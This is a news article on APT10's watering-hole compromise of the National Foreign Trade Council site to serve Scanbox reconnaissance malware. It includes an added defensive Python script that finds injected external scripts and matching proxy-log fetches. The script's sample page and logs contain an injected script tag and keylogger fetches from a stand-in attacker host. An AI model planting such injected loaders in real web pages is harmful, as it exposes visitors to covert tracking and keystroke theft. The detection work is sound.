A threat actor linked to China compromised the website of a prominent U.S. trade association in an effort to serve reconnaissance malware to visitors of certain web pages.
Fidelis Cybersecurity published a report detailing the campaign on Thursday, just hours before a meeting between U.S. President Donald Trump and his Chinese counterpart, Xi Jinping.
The company noticed in late February that the website of the National Foreign Trade Council (NFTC) had been hacked and set up to serve malware in what is known as a watering hole attack, or a strategic web compromise. Researchers believe the attack ended by March 2, when the links injected into the NFTC website were removed.
Evidence uncovered by investigators led them to attribute the attack to the China-linked cyber espionage group tracked as APT10, also known as menuPass and Stone Panda. Fidelis has dubbed the campaign Operation TradeSecret.
According to researchers, the hackers rigged certain pages of the NFTC website to serve a JavaScript-based reconnaissance framework known as Scanbox. The tool has been in use for several years, including in attacks aimed at U.S. organizations and the Uyghur population in China.
Scanbox runs in the visitor's browser rather than as a binary installed on the machine. Its plugins collect information about the visiting system and the software installed on it, and can log keystrokes entered in the web page. The harvested data can then be used to tailor further attacks against the targeted individuals.
In the case of the NFTC, whose board of directors includes representatives of some of the largest private sector companies in the United States, APT10 rigged only specific web pages. One of them was the registration page for a board of directors meeting, which suggests that people or organizations expected to attend the meeting were the intended targets.
“All organizations that have representatives on the board of directors of the NFTC — or those who would have a reason to visit the site — should investigate potentially impacted hosts using indicators provided in this report,” warned Fidelis. “Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks — such as spearphishing campaigns.”
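A watering hole of this kind typically works by injecting a single external script or iframe reference into otherwise legitimate pages, which is why removing the injected links ended the campaign. The following is an added example, not code or indicators from the Fidelis report: it scans saved copies of a site's pages for script, iframe and similar references that point outside the site and its allowlisted hosts, then searches proxy logs for clients that fetched anything from those hosts. The site name, allowlist, attacker host and log lines are all constructed for illustration.

```python
"""Find injected third-party script/iframe references in saved HTML pages and
identify hosts in proxy logs that fetched them. Added example; every domain and
log line below is constructed, not an indicator from the Fidelis report."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical site and allowlist of legitimate third-party hosts.
SITE_HOST = "www.association.example"
ALLOWLIST = {"cdn.association.example", "static.cdnprovider.example"}

# Constructed copy of a registration page with one injected script tag.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="/css/site.css">
<script src="https://cdn.association.example/js/jquery.js"></script>
<script src="//static.cdnprovider.example/analytics.js"></script>
</head><body>
<h1>Board of Directors Meeting Registration</h1>
<form action="/register" method="post"><input name="email"></form>
<script src="//recon.attacker.example/js/p.js"></script>
</body></html>"""

# Constructed proxy log: timestamp client method url status
SAMPLE_LOG = """2017-02-27T14:02:11Z 10.1.5.23 GET http://www.association.example/board-meeting/register 200
2017-02-27T14:02:12Z 10.1.5.23 GET http://recon.attacker.example/js/p.js 200
2017-02-27T14:02:13Z 10.1.5.23 GET http://recon.attacker.example/plugins/keylog.js 200
2017-02-28T09:10:44Z 10.1.7.8 GET http://recon.attacker.example/js/p.js 200
2017-02-28T09:12:00Z 10.1.9.2 GET http://www.association.example/about 200
2017-03-01T08:00:00Z 10.1.9.2 GET http://static.cdnprovider.example/analytics.js 200"""


class _RefCollector(HTMLParser):
    """Collect attributes that make the browser fetch (and often execute) a remote resource."""
    TAGS = {"script": "src", "iframe": "src", "link": "href", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = self.TAGS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def host_of(url):
    """Hostname of a URL, or '' for a relative (same-origin) reference. Handles //host/path."""
    return urlparse(url).hostname or ""


def is_allowed(host, site_host, allowlist):
    """True if host is the site itself, an allowlisted host, or a subdomain of one."""
    for trusted in allowlist | {site_host}:
        if host == trusted or host.endswith("." + trusted):
            return True
    return False


def external_refs(html, site_host, allowlist):
    """(tag, url) pairs that load a resource from outside the site and its allowlist.
    Relative URLs are same-origin and skipped; inline scripts are not covered."""
    parser = _RefCollector()
    parser.feed(html)
    return [(tag, url) for tag, url in parser.refs
            if host_of(url) and not is_allowed(host_of(url), site_host, allowlist)]


def hosts_that_fetched(log_text, suspicious_hosts):
    """Map client IP -> URLs it requested from any suspicious host.
    Matching on host rather than exact URL also catches follow-on plugin loads."""
    hits = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        if host_of(url) in suspicious_hosts:
            hits.setdefault(client, []).append(url)
    return hits


if __name__ == "__main__":
    injected = external_refs(SAMPLE_PAGE, SITE_HOST, ALLOWLIST)
    print("injected references:", injected)
    bad_hosts = {host_of(url) for _, url in injected}
    for client, urls in hosts_that_fetched(SAMPLE_LOG, bad_hosts).items():
        print(client, "fetched", urls)
```

Two caveats a practitioner should keep in mind: the page scan only catches references to external hosts, so an inline or obfuscated loader would need a diff against a known-good copy of the page instead, and every allowlisted third-party host is itself a place where a similar injection could occur.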
The security firm said it notified the lobbying group of the breach. SecurityWeek has reached out to NFTC for comment and will update this article if the organization responds.
Fidelis also reported seeing a similar campaign involving a fake website of Japan’s Ministry of Foreign Affairs. The APT10 attacks targeting Japan were also detailed in a report published this week by PwC UK and BAE Systems.
The research conducted by the two companies focused on attacks launched by APT10 against managed service providers (MSPs) in at least fourteen countries.